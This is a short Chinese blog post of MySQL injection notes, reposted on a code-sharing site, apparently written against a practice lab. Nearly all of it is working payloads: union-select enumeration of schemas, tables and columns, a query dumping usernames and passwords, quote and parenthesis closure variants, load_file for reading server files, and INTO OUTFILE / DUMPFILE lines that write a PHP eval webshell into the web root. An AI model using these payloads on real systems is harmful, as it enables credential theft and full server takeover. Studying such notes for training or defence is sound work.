码迷,mamicode.com
首页 > 数据库 > 详细

Mysql注入笔记

时间:2017-12-05 20:11:20      阅读:268      评论:0      收藏:0      [点我收藏+]

标签:sch   获取   信息   pst   amp   导入导出   into   file   需要   

1.基于字符型报错注入

报字段数:

‘ order by 3 --+    // “+” 代表空格

‘ union select 1,2,3 --+

‘ UNION SELECT 1,GROUP_CONCAT(SCHEMA_NAME),3 FROM INFORMATION_SCHEMA.SCHEMATA --+  // 获取数据库信息

‘ UNION SELECT 1,GROUP_CONCAT(TABLE_NAME),3 FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA=0x7365637572697479 --+  // 获取表信息

‘ UNION SELECT 1,GROUP_CONCAT(COLUMN_NAME),3 FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME = 0x7573657273 --+  // 获取表字段信息

‘ UNION SELECT 1,GROUP_CONCAT(username,0x3a,password,0x20),3 FROM security.users --+ // 获取数据o

2.基于数字型报错注入

不需要使用 ‘ 进行闭合,直接利用,利用方法和字符型一样

3.字符型报错注入(带())

‘) order by 3--+  // 使用 )进行闭合

4.字符型报错注入(带")

") order by 3--+  // 

5. 导入导出函数

select load_file(“C://TEST.txt”);

select "<?php eval($_POST[‘chybeta‘])?>" into outfile ‘C:/phpstudy/WWW/test/webshell.php‘;

select "<?php eval($_POST[‘chybeta‘])?>" dumpfile ‘C:/phpstudy/WWW/test/webshell.php‘;

6.POST类型注入

uname=admin‘#&passwd=chybeta&submit=Submit

uname=admin”#&passwd=chybeta&submit=Submit

Mysql注入笔记

标签:sch   获取   信息   pst   amp   导入导出   into   file   需要   

原文地址:http://www.cnblogs.com/seeker01/p/7988875.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!